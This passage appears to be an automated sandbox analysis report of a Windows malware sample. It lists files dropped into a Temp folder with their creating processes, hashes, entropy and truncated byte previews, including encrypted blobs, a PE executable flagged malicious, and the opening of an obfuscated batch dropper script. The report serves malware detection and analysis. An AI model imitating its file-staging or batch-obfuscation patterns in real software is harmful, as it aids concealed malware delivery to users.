                                                                                                                                  MD5:95D0644D2EF884485D61CCA79E17B1CD
                                                                                                                                  SHA1:24499736CDEFD169B81ADFEE96EECB77BBCD2CF3
                                                                                                                                  SHA-256:90F3A0986048C053DA716E5B64D92807AA600739CAFC19207A101BD843A779A9
                                                                                                                                  SHA-512:BC7C9EFFAA1E6AB23DA85DA801F64AAA1DD4F65BEF5BECC1636A5D5B7BEE7025C0AED6AAEB8BA54A2454628B7252C098010B53A689B7B3F31D3DBB8195785DB8
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:.Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Ottawa

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):61440
                                                                                                                                  Entropy (8bit):5.9475128045113115
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:vsWccd0vtmgMbFuz08QuklMBNIimuzaAwusm:DeAg0Fuz08XvBNbjaAtsm
                                                                                                                                  MD5:DCC58B08997FA508D67CDF34FAD559AC
                                                                                                                                  SHA1:B247157971A94EEE4D4C7034C72844618E0F52F9
                                                                                                                                  SHA-256:2643095218EEB2AE2F46FF6A15F416EBD7254522C61AA1E2364E03B8E2E90DAA
                                                                                                                                  SHA-512:24655C9E93DA723148A031640DD80F2B00328645AD3F9671FF2B582346B85EBF843C5C437D441827E87F481149D4006FAF1202134E6D70073A358CCCC03637D7
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:.A...a.f.-.Z.A...k.a.-.G.E...f.o.-.F.O...h.i.-.I.N...m.t.-.M.T...s.e.-.N.O...m.s.-.M.Y...k.k.-.K.Z...k.y.-.K.G...s.w.-.K.E...u.z.-.U.Z.-.L.a.t.n.....t.t.-.R.U...b.n.-.I.N...p.a.-.I.N...g.u.-.I.N...t.a.-.I.N...t.e.-.I.N...k.n.-.I.N...m.l.-.I.N...m.r.-.I.N...s.a.-.I.N...m.n.-.M.N...c.y.-.G.B...g.l.-.E.S...k.o.k.-.I.N.....s.y.r.-.S.Y.....d.i.v.-.M.V.....q.u.z.-.B.O.....n.s.-.Z.A...m.i.-.N.Z...a.r.-.I.Q...d.e.-.C.H...e.n.-.G.B...e.s.-.M.X...f.r.-.B.E...i.t.-.C.H...n.l.-.B.E...n.n.-.N.O...p.t.-.P.T...s.r.-.S.P.-.L.a.t.n.....s.v.-.F.I...a.z.-.A.Z.-.C.y.r.l.....s.e.-.S.E...m.s.-.B.N...u.z.-.U.Z.-.C.y.r.l.....q.u.z.-.E.C.....a.r.-.E.G...z.h.-.H.K...d.e.-.A.T...e.n.-.A.U...e.s.-.E.S...f.r.-.C.A...s.r.-.S.P.-.C.y.r.l.....s.e.-.F.I...q.u.z.-.P.E.....a.r.-.L.Y...z.h.-.S.G...d.e.-.L.U...e.n.-.C.A...e.s.-.G.T...f.r.-.C.H...h.r.-.B.A...s.m.j.-.N.O.....a.r.-.D.Z...z.h.-.M.O...d.e.-.L.I...e.n.-.N.Z...e.s.-.C.R...f.r.-.L.U...b.s.-.B.A.-.L.a.t.n.....s.m.j.-.S.E.....a.r.-.M.A...e.n.-.I.E...e.s.-.P.A...f.r

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Portions

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1116
                                                                                                                                  Entropy (8bit):3.457209159210881
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:UyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1zgNu3NIhfnQ2:UyGS9PvCA433C+sCNC1skNkvQ2
                                                                                                                                  MD5:7AA678448D2E251624FB581A182C933E
                                                                                                                                  SHA1:9BC43EF4A483612DA2DB2DFC6EAFD01C9B1991F8
                                                                                                                                  SHA-256:0590F5CFF2D3DEBB5F0DE0D7A1BCDB9BAA7E7B23801980DEFBB3CF58AFB8DEC8
                                                                                                                                  SHA-512:48543D2639E31ABCE2DC56F4911880619CBA45F597C0799AEC4864A899536E3F473634EAD584A11EF1E1B706FB217F52CB2741BDAEEE81B85A7FAA121E228BE7
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:Principle........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.......................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Pupils

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\appFile.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):68608
                                                                                                                                  Entropy (8bit):7.997577013133
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:1536:BJuPE9dlj9o8t/0k9I//XBFuQZqZ0S/bUsG3ZY0HKi1:BJ+YHoY8JXIDUskYNi1
                                                                                                                                  MD5:608D07816B44F5FE82201DA3590A0E01
                                                                                                                                  SHA1:071B8ECEA7E81EDA116E59561EC84ABF56051183
                                                                                                                                  SHA-256:5280CD6E12F5AABBB49B362CFEBF15CF9245926292CE3BE63C341DF63E0B1E05
                                                                                                                                  SHA-512:E60AE32767E0CB3B69EDBC0695C2B0F0ABF85B98DF08FD3DA8ECD3E6093C638D90F7A9CC482B1316F3D6A5C8BFD75FD34FDADDE6A55F622E43D62CFFB38FD757
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:j.....w..d....s4.....S....h.......a...H..V...tR>...X.*o.n.....l.........k9.x...[.p.e...v*'V...(....W`K|.X....M`.s.....8P....-.........T....rJ.9.G...s.6...V...w...d>n..^.m`..2;.........K....K.Y...,.!.(C..u.m..'.[[........S).jgD..l..b...O.U..u(f..O.../I.D4.+..S.e.....L...=...[.yq.ihf.~. .Y..J...7...muC...0hbcs@9.>..0!t5...4..E.=k..*#....6.=..6......Zh......>~r........=E*......u<Nf/.hS.. .g...a..F....#.......]R.zU.xp.H...w"P.S....V;.....2e?...2.....X........Z...xR.g../..:..^......,3..>.o....jD...-..?......Bs..d...X).....%.'...t.gHS.F...v...D....n]....X.D...|?...Q..7.t...W..t...4h^%%.v.q@j9...{.mX.l...`Y..h.....u..7.._7..A.f:{.a.=tXO..H..nc7.,.r...k.].S..Ji......k.F.....T.;...!6...h....8.,......c0.......ip.W.]u..].J.a..K.O.p.P`.2iyI;ZZU....p..u....A.......$_...s..z..`i].....&......<.....\=..I_....q.=.^.bY.....h....s...;!...BW.<zZ.q...Ar.0...\.h.35....R..)."K.+.C%.t.@....R.j..a9.~?.(.coP....c....#....y.I...c....a.r...T.`.g......Q.6I..hN.|{T.....

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Purpose

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):104448
                                                                                                                                  Entropy (8bit):6.326134603271681
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:beoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTq8QP:sO5bLezWWt/Dd314V14ZgP0JP
                                                                                                                                  MD5:04FA07B9817A4D384B9A42487F6C3D63
                                                                                                                                  SHA1:38B7E4CB5DCA339A7F1703B11637BF962298E4CD
                                                                                                                                  SHA-256:03121838E235043743D471728F2E74718DD4D98BADF8B75DABA52FD8B2BCCA58
                                                                                                                                  SHA-512:6DB6B4DF6DBBDC5AF550E140A5241A8AC5FA3AF6F9FCA161B80D0F177862174F469306E4687831F43B149856B3436344EE5A5150629AE7A5CFF03D5B116B9CF7
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:.S.Fl..........:6...f..j.Xj.j.P.F..>.|$,S..l...........6...f..j.X.>.F..t$...`.I..,...@..|8...L8.t..I8.A......|8...L8.t..I8.A.._^3.[..]...U.........SV3..D$ ..K.WVj..t$0.t$4.t$8.D$p,.......I....D$hPW....I..]..L$..G....L$H.>.....$....P.L$\......D$H3.P.D$.PV.L$d.2.......L$X.0....D$HP.L$..?...9s.t(.C..0...9....F.3.V.p..0.t$ .t$ ..1....uA.D$p.L$$.D$4.D$..D$8.D$..D$<.D$..D$@.D$..D$D...D$4P......L$8.....L$H.....L$......D$hPW....I.........W..`.I..M.......|$,..j..O.Qj.S.C...VVj.j.S.gj....$.....[4..3..>@.F............D$(.t$ .D$......Pj.Vj.j.S.*j............L$......D$..D$...y.....L.j.Vj.j.S.\$$..i...........3...D$..D$....F.........t$ F.D$..t$ ...u..L$$.D$$..K..k....t$(.N..Y_^3.[..]...U..QSV.u.W.....3...&.3.B.V....H..|9...D9.t..@8.P..|9...D9.t..@8.]..@...C..0...j....N..E.P.U.."*...}..Y.......u.j.h........I............K..I.........t9...t-...t$...t....t....uf.....................j ....@....j@XPV....I..]....2..3.@.C......H..|9...D9.t..@8.`...|9...D9.t..@8.@..V..`.I._^3.[....U..E.W...p.P....

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Remarkable

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):133120
                                                                                                                                  Entropy (8bit):4.756981611361345
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:/ex/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8/:2dKaj6iTcPAsAhxjgarB/5el3EYrq
                                                                                                                                  MD5:3535CC5FBCBF2958B3B297BD69BF47CD
                                                                                                                                  SHA1:2520C22125F63826A8F09692A5BFE68EFF762E44
                                                                                                                                  SHA-256:961947DA8BF4701219847F9666E659E9CEA412882CAD2AFF579BE88818BB6019
                                                                                                                                  SHA-512:8DAD4DAC154A0225A7162111574105BFED10B4F36A0941EE76EEE2D76A826D7FF60AAE039CD53DC154729092BDA1E1AF02011699FE08084D6E7F81A72ED3BDA6
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:...............r...............r.....r...........r.r...................r.r.....r.r.......r.r.r.r.r.r.r.r.....r.r.r.r.....r...........r.r.....................................r.r.r.r.r.r.r.r.r.r.....r.............r.r.r.......r.........r.r.r.....r...r.....r.r.r.....r.r.r.......r.r.r.........................r.r.r.r...........r.r.r.......r.........r.r...r.r.r.r.r.r...r.r.r.r.r.r.r.r.r.r.r.r.r.r...........................................r.r.r.r.r.........r.................r.......r...............................................r.................................r.r.r.................r.......r.........r.r.r.r.r.r.r.....r.....r.r.r.r.r.r.........r.r.....................r.r.r.r.r.r.r.r.................r.......r.................r.......r...............................................r.....................r...........r.r...................r.......r.........r.r.r.r.r.r.r.....r.r.r.r.r.r.r...r.........r.r.....................r.....r.r.r.r.r.r.r.r.r.r.r.r.r.r.......r.................r.......r........

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Requirements

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\appFile.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):84992
                                                                                                                                  Entropy (8bit):7.997750312086192
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:1536:+uxKqXB1AZIrADNwtT4ZmkUyU9dtRxcmHBrDdWMj4EKojcfsYXdYeD5mLtrLx8:9HB1G+tUQtRldWMj4QjcLNYeD5uK
                                                                                                                                  MD5:408758400806F3EDE15B962E264A944B
                                                                                                                                  SHA1:68C12283BB13F821FD5A13190D98DED41680D0B4
                                                                                                                                  SHA-256:4F5AD43ADA7AE9EF32489CFCBD529BA03C90D842177AD85B0E49C375C1133A47
                                                                                                                                  SHA-512:8D87FB16E15B5C80AF66190E2C9664361D9D1CD0FF493A2AB7286FCDCF0B8A125FB5BE983A3C3FAACA178BCE890899E7F205EB458D569E6741A0BCD2CE0EE0E4
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:...{.b .r%^2( M...K{.S..;..4..N..i8.U_.....A.$3.9...yg.&|O="A....pG..z.......X....h..L..9..H...5.@.\q"1.l.!.....Y1@.{.$K...P.....u?.4X.q..)*+*....J...._..zo<t..... .bx.D.... ..l.*.wT....$.}5..9.\)..E"IK....`..{P.z.J.kT#...~....b.U,w..9R3..eb..o.;8...&.C..(.,...is.u.kB.. ..4nG.y.gS..:/.4....."G6.......K..2..R..AJ..|.8...9...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....D.F.'.F...h..............V..{....V..{...kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..q.P..,P..Myn.2..t.W....V`.........>.V...h...V..{...m.........8.5...x..2).U.j....2>..#.~...........i.1.|.X=.h...F,.G.."=.....a2I.v...*.pW.EMcY.P.4..l.}......... ........yd.{..Q.'..E...G.=.R.14kv..J.Hu.E_hNV.)y.lL...CM.

                                                                                                                                  C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\723356\Ted.com
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):12178693
                                                                                                                                  Entropy (8bit):7.975939142643874
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:196608:Ex6Xhm3naEJp1N1x7JpGTRQTrwlZJdO6T+nAIy986TeaZcSSFDie:Ex6Xw3RJbdVpGmT8ldkn+8sZcSK
                                                                                                                                  MD5:1EBAB72F39900F4DB9D82A4850B32ABD
                                                                                                                                  SHA1:8A24CC7CFDC1EA67184DA0D82E1D88E734FCEBD4
                                                                                                                                  SHA-256:AD09505CF7A0063496FCAD806C5D7F4949593A8F77EB6DCF78C3B7331F5F6C0B
                                                                                                                                  SHA-512:8644E54AF04B4A070ADDFDCCD62F45F6078A815D898B2319AFBB6EBF4D86FFD61F654E1E4310CE82634D9535C810AAFEFCAAD76CEA1301DA155D16E53A3AD645
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@.................................0O....@......@...................p..q....P..........................P(...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Serious

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):81925
                                                                                                                                  Entropy (8bit):6.979639064635769
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:IWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:IWy4ZNoGmROL7F1G7ho2kOb
                                                                                                                                  MD5:6A4C82D9AD4C5E7F81C99546EB64D331
                                                                                                                                  SHA1:339CD7429C426E86A088A539B054DECC4E229F71
                                                                                                                                  SHA-256:A1BEC3AEFBA6E6E2244A1FF5F9529400914A60CEDD6A190BA7B0220AB1472578
                                                                                                                                  SHA-512:1D4EC3B9441FC10C51A9AC2AB5E403E0605E249F287A804CF47848E57CFAA45629A3E75B3D6ADBFA7318C06070FD82AA58650C276AAD84ECA4EDA4F713E9D1DC
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:...v.......^..............v..........................a..........i...........................w......o..........._..........n..._..............m...............s...t...........v..................................}...................f......r.......}..........`.............q.................i...h............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Shelf

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\appFile.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):93992
                                                                                                                                  Entropy (8bit):7.997999527028523
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:1536:ABgGV+8wTYC6OrH8gLm6lMZ3ScOJaa8olaZZIrQOKqL6c4M8WfJ1:ABL/k8gLbl437OJL8oX8U6cl93
                                                                                                                                  MD5:0139E23CC911EDE463F44FA26F3657CE
                                                                                                                                  SHA1:DB1DB1FB6AAB61305206F7C7D49EC8048798EC9E
                                                                                                                                  SHA-256:3AB9C282835F7B1F065D8C6619B8A01759F23D1B8169AF4D4E2611608BC5FEBA
                                                                                                                                  SHA-512:1008DECE973CF7642F7E618F5CEEA8FA67CE05B70B9662541D86ED9DDA032C9660048FF89D9088C12422C28BE6108A04F0B67C4BB9A303C7173A5F7E1D4AB513
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:*...._...k..l...hJ...........'M.4.`.|..Y.b,~...y.s.c.8..v.L...E.$.4'p=..2^.;.R.h._.....|........|..{)<..0..h.......3I.~.n.xXf.G.......Q..$.qf3.}.c..c....z........8E..=zL...."...B...eV...D...L..Q..h.Ms.|.$I..4... .$..y.LYa&.......G.?J.TT./..0g..~?.B..Wn.A.--...>.2?u...QB.w*L.~...Q.Q..2....:1-.o..`.:.Ke...B,..OE-..4. <'...........@....y5X2.7ZU6.V./..^~.f`hXf....X.../0O&..._9Y....?B...I.gC..Iy..l.|...LI..Z...C.GX.N.[+..D......8.f..]q.]d.$.~y..<..e..T..HuH...B.....4^..,........m.i..C."....]...s.$.k..r..%...B....5..!...z$....F.D+..........G....J.\|..H..x.O......2.3..O67n.V!z.@..8....~2x4g..k(.Zsn[.yU....K....b.q........I(.QL.BX.|v'..lU.p..L.PY...e.(..2..[%.3p9).@B.pMl...3...J =..3n..x..EL[(H,..^.R.f.}qiQ..r.l...W...........t....$.....$]....(..X^...kp.tj..^.X@..i.:$..?5;iMGy../.K....~..g....|.Ui.......-..B.?..u+....K...946..[j.....~ .!.5...@.M..SX;.\...X..wB...G. .S...s(.s`..;st.m..%.........<...-.P...^=...,....i....e".;J.....$T.......{...E.DQ%

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Shore

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\appFile.exe
                                                                                                                                  File Type:ASCII text, with very long lines (1378), with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):30823
                                                                                                                                  Entropy (8bit):5.088078693727599
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:hTTI2Sl3sEuf+ZtAUdptK7+witRglsv02m4BPgFGuue9O:9fobi+tUszv5kNO
                                                                                                                                  MD5:F129171E4688C35F8066A1474CEC7452
                                                                                                                                  SHA1:F52DF1C32608804DCDF74704F9269AA4AE804A0A
                                                                                                                                  SHA-256:99B24D761E541373E3D394BDA82DA43232323E068ACB36C3F3DDBE29A902B5C3
                                                                                                                                  SHA-512:D11EA8A26BF33CE0BF970676CB30A4741B2D0E27116F3A378C11039940EB8320F88491F3305321D3F495726248D4300DD65FF0441A17AEF66460E5C881F26997
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:Set Interpreted=h..MtCompromise-Generators-Narrow-..WhYGolf-Ciao-Knights-Grades-..vyInnovative-Bidding-Including-Moon-Vincent-Nfl-Opportunity-..BarsMissing-Cr-Oil-Reference-Released-..erwIGap-Kitchen-Psychological-..YwAdaptive-Exit-Wrapped-Hc-Dans-Empire-Layer-..ENAlexandria-Modules-Concluded-Otherwise-Sophisticated-Single-Utils-..IvAeHs-Hobby-Bulk-Contrast-Intervention-Tf-..UmEAdaptation-..oZdIntel-Export-End-..Set Fraser=X..FbRemedy-Joshua-..VGThFired-..HiwQLiteracy-Overhead-Delays-Accepting-Audio-..uNWInns-Genesis-Claims-Backgrounds-Presidential-Dpi-Pee-Sweet-..onpSpots-Regulatory-Asbestos-Browsing-..Set Password=n..mCCursor-Sugar-No-..cyxEarrings-..krdvResort-Confidentiality-..KCbVBacked-Printer-Buf-Reference-Website-Watt-..dASiOscar-..IPbxSheets-Physician-Churches-Fundamental-Ide-Lady-..iCSandwich-Yn-..fgBYFw-House-Broken-..JKClients-Extra-..Set Skirt=T..DdIntroduces-..tTXaDiscrimination-Had-Ought-Commitment-Grow-Complaints-Polished-Textile-..OWXGProtection-Goals-Baltimore-..MvOLe

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Shore.cmd (copy)

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  File Type:ASCII text, with very long lines (1378), with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):30823
                                                                                                                                  Entropy (8bit):5.088078693727599
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:hTTI2Sl3sEuf+ZtAUdptK7+witRglsv02m4BPgFGuue9O:9fobi+tUszv5kNO
                                                                                                                                  MD5:F129171E4688C35F8066A1474CEC7452
                                                                                                                                  SHA1:F52DF1C32608804DCDF74704F9269AA4AE804A0A
                                                                                                                                  SHA-256:99B24D761E541373E3D394BDA82DA43232323E068ACB36C3F3DDBE29A902B5C3
                                                                                                                                  SHA-512:D11EA8A26BF33CE0BF970676CB30A4741B2D0E27116F3A378C11039940EB8320F88491F3305321D3F495726248D4300DD65FF0441A17AEF66460E5C881F26997
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:Set Interpreted=h..MtCompromise-Generators-Narrow-..WhYGolf-Ciao-Knights-Grades-..vyInnovative-Bidding-Including-Moon-Vincent-Nfl-Opportunity-..BarsMissing-Cr-Oil-Reference-Released-..erwIGap-Kitchen-Psychological-..YwAdaptive-Exit-Wrapped-Hc-Dans-Empire-Layer-..ENAlexandria-Modules-Concluded-Otherwise-Sophisticated-Single-Utils-..IvAeHs-Hobby-Bulk-Contrast-Intervention-Tf-..UmEAdaptation-..oZdIntel-Export-End-..Set Fraser=X..FbRemedy-Joshua-..VGThFired-..HiwQLiteracy-Overhead-Delays-Accepting-Audio-..uNWInns-Genesis-Claims-Backgrounds-Presidential-Dpi-Pee-Sweet-..onpSpots-Regulatory-Asbestos-Browsing-..Set Password=n..mCCursor-Sugar-No-..cyxEarrings-..krdvResort-Confidentiality-..KCbVBacked-Printer-Buf-Reference-Website-Watt-..dASiOscar-..IPbxSheets-Physician-Churches-Fundamental-Ide-Lady-..iCSandwich-Yn-..fgBYFw-House-Broken-..JKClients-Extra-..Set Skirt=T..DdIntroduces-..tTXaDiscrimination-Had-Ought-Commitment-Grow-Complaints-Polished-Textile-..OWXGProtection-Goals-Baltimore-..MvOLe

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Sound

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\appFile.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):71680
                                                                                                                                  Entropy (8bit):7.997085946261103
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:1536:etE3bNAZ3AnT/wiUH4lNh2/x7e7lw6fS2BLf2jkHY8:et+6pAnciUS/2YJnz2jkHY8
                                                                                                                                  MD5:7B793FD613F7C5CB7BC335CD088FB2E9
                                                                                                                                  SHA1:3C40BDC5FBC8CEFD4BDC184A1A72819FF0B0F259
                                                                                                                                  SHA-256:5F2804AF243F7838DFF5E7ACCAD2B685E75628276465053ECB7E7800A09119C8
                                                                                                                                  SHA-512:ED80AAFD1B26FD5EDB1B689BB00179FBC2D41F0CF3C1D63CCF9297C81F0B7166C26C807DA71300627F12B27A9D1AE6090BAEBE53A9301C91C004D81275F00DF5
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:].B......i-..(....c8.SP..<....L...x....f.d.....vJ.F]...g@$...<..D.....>\...Q....!.....l.N2..To....j...d!...K..z....-G.9...p$A.M.?0-'.7AU...F.|.....:X.<.j?.L..f.t8."..m..&.p<...J...._.rD..]..-w.{\T{0..{...K.:7.e.....U.x.l.j~.....#.t.-..N._.g..~Q..K.X.n.p..=\.KGv{K.S..J..H..&.x............D..5...Y".n.U.2..d<q..T2.UV.^../Dx!....7.....gcj+.,..z;*.ju..j.yy.....4r...+0G...s/!..7E;.K?..k...4k.JG.dA.'.^.0T.Z.:G..\..i/....# .q.)..tA@.....<.S."..l...?%.Lv.G.....0O4.Fj.4.D.Q]..w]...p.J.;...3...b.@|....%....e.q4.R~..$.....mZ...B..X...}6..`....Q.X.....Y^f-.g..mJ.J.(L....4k.<>..(.m.+.|.b.Os......|[aqb.H<..........WW..5|.D........d.f.o...._U..zG.*......u\.#?~5.a..|..Rm\;z>Rl......o>R...9......,.IZ>.=..uLn.$<x.U.x:$..UZ../kp.......8Cm.i...,.(....O.&}RD...l...!p...w..c...z6.;T..).7vW.[. .1.....(..`.,Yk...P..S+.\..J:.Vm.i.W.=r...\...0...t.....a..e.....A. C.H`..x..$.D.Q@6.1..>.Vm ...id9&.G...qE..1....[.6c.&D...G...{h...b........n{.?'+:...E"ym|..\.VD.......7...

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Tmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):74752
                                                                                                                                  Entropy (8bit):6.584018665338963
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:/i8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu6/sPYcSA:u0Imbi80PtCZEMnVIPPBxT/sZj
                                                                                                                                  MD5:B5F8CAFF35F3F66AEF7ADB0F4E305850
                                                                                                                                  SHA1:C1C5EB3D8C690D25044C6B341E7C768BAB72B1CE
                                                                                                                                  SHA-256:72A4C485593FC7EFA24A293E7833CACB89BB98089AFE24344B40B976F95A07C9
                                                                                                                                  SHA-512:51F92D7A688A33469A737D945C3E1FE1535281B2DB69461649D5751564C7806D8EE37758804AC1E42991C2D020AD9AAD0D6F8DA4869578CEECF24FC7B0A2E9C3
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:t.....L.....3...M.......E.3......U.U..........u...t.j..Z..Yj...x..;.t....t....u#.C..E.c..;.u;........E...........;.u"k.|'J....k..'J....E.;.t%.`.........L....j Y+.3...3...L..M...E......1....}..uk;.u6.W...p.W.M.....I..U.Y.+j._.u..].E.E.}..t.j..Y..Y.V.M.....I..U.Y;.t....t....u..E.C.;.u..`W...M.H.3...G....U..Q.GW...HL.M..M.QP.X...E.YY.@...]..U..V.u..........F.;...L.t.P.ZS..Y.F.;...L.t.P.HS..Y.F.;...L.t.P.6S..Y.F.;...L.t.P.$S..Y.F.;...L.t.P..S..Y.F ;...L.t.P..S..Y.F$;...L.t.P..R..Y.F8;.(.L.t.P..R..Y.F<;.,.L.t.P..R..Y.F@;.0.L.t.P.R..Y.FD;.4.L.t.P.R..Y.FH;.8.L.t.P.R..Y.FL;.<.L.t.P.R..Y^]..U..V.u...tY..;...L.t.P.aR..Y.F.;...L.t.P.OR..Y.F.;...L.t.P.=R..Y.F0;. .L.t.P.+R..Y.F4;.$.L.t.P..R..Y^]..U..E.SV.u.W3......+......;.....#.t..6..Q..G.v.Y;.u._^[]..U..V.u.........j.V.....F.j.P.....F8j.P.....Fhj.P..........j.P.|..........Q.........{Q.........pQ........j.P.M.........j.P.?.....D......j.P...........j.P. .....L...j.P.......T.....Q....X.....Q....\.....Q....`.....P

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Ul

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\appFile.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):82944
                                                                                                                                  Entropy (8bit):7.997845707987516
                                                                                                                                  Encrypted:true
